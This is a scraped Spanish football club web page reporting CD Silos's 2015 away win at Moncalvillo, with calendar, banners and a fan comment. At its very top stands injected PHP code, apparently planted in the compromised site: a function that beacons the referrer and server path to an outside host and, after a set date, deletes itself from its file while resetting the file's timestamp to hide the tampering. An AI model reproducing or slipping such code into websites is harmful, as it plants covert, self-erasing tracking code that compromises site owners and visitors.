check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731446){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } El CD Silos despide el año con una nueva victoria.

La Afición

Calendario

<<  Abril 2017  >>
 Lu  Ma  Mi  Ju  Vi  Sa  Do 
       1  2
  3  4  5  6  7  8  9
10111213141516
17181920212223
24252627282930
Banner
Banner
Banner
Banner

Acceso Privado Equipo



El CD Silos despide el año con una nueva victoria. PDF Imprimir E-mail
Lunes, 28 de Diciembre de 2015 17:25

En Moncalvillo jugaba su ultimo partido del 2015 el CD Silos con la intención de mantenerse en la lucha de la primera plaza que se está disputando con Quintanar de la Sierra.

Pronto comenzaban a ponérsele las cosas de cara a Silos al culminar una jugada rápida, sin embargo en el remate Ricar sintió unas molestias que propiciaron su salida del terreno de juego y la entrada de Chori.

A partir de ese momento Moncalvillo estuvo mucho mas presente en el área silense a base de corners y segundas jugadas. En una de esas jugadas embarulladas Moncalvillo conseguía el empate aunque no le duraría mucho la alegría ya que Silos volvía a adelantarse por medio de Cule.

Con el partido de cara para Silos llegaría la jugada polémica del partido, contrataque de Moncalvillo que acaba con un jugador de Silos en el suelo, los locales no mandaron fuera el balón y aprovecharon la situación para volver a igualar el marcador. Con cierta mejoría visitante llegábamos al descanso con todo por decidir en un grupo donde ya no sirven los empates.

No tardaría mucho en volver a adelantarse Silos en el marcador, gran jugada de Kross por banda derecha poniendo un centro medido que Juanma solo tenia que empujar al fondo de la red.

Desde ese momento el partido fue un monologo silense con Moncalvillo acusando el esfuerzo de ir por debajo en el marcador. Fruto del dominio visitante llego el cuarto gol de la tarde, inapelable remate de Pocho que ponía ya mucha tierra de por medio. Culminaría la gran segunda mitad Caramés, fruto de otra gran jugada remataba en el segundo palo poniendo el definitivo quinto gol en el marcador.

De aquí al final alguna jugada de merito de Caramés y una gran parada de Adrian fueron lo mas destacable junto con la aficion silense, muy numerosa en esta ocasión.

Final de año que deja a Silos en una inmejorable posición para pasar unas felices Navidades esperando con ganas el inicio de año.

Desde el Club Deportivo Silos os deseamos feliz Navidad y feliz año nuevo.

DEPORTIVO!!!

 

Comentarios  

 
+1 #1 Ele 28-12-2015 22:54
Aúpa ese deportivo y feliz navidad a todos de Rodrigo, Gael y Elena
Citar
 

Escribir un comentario

Código de seguridad
Refescar

Banner
Banner

Colaboradores

Banner
Banner
Banner
Banner
Banner
Banner



By vicencid. Potenciado por Jommla!. Valid XHTML and CSS.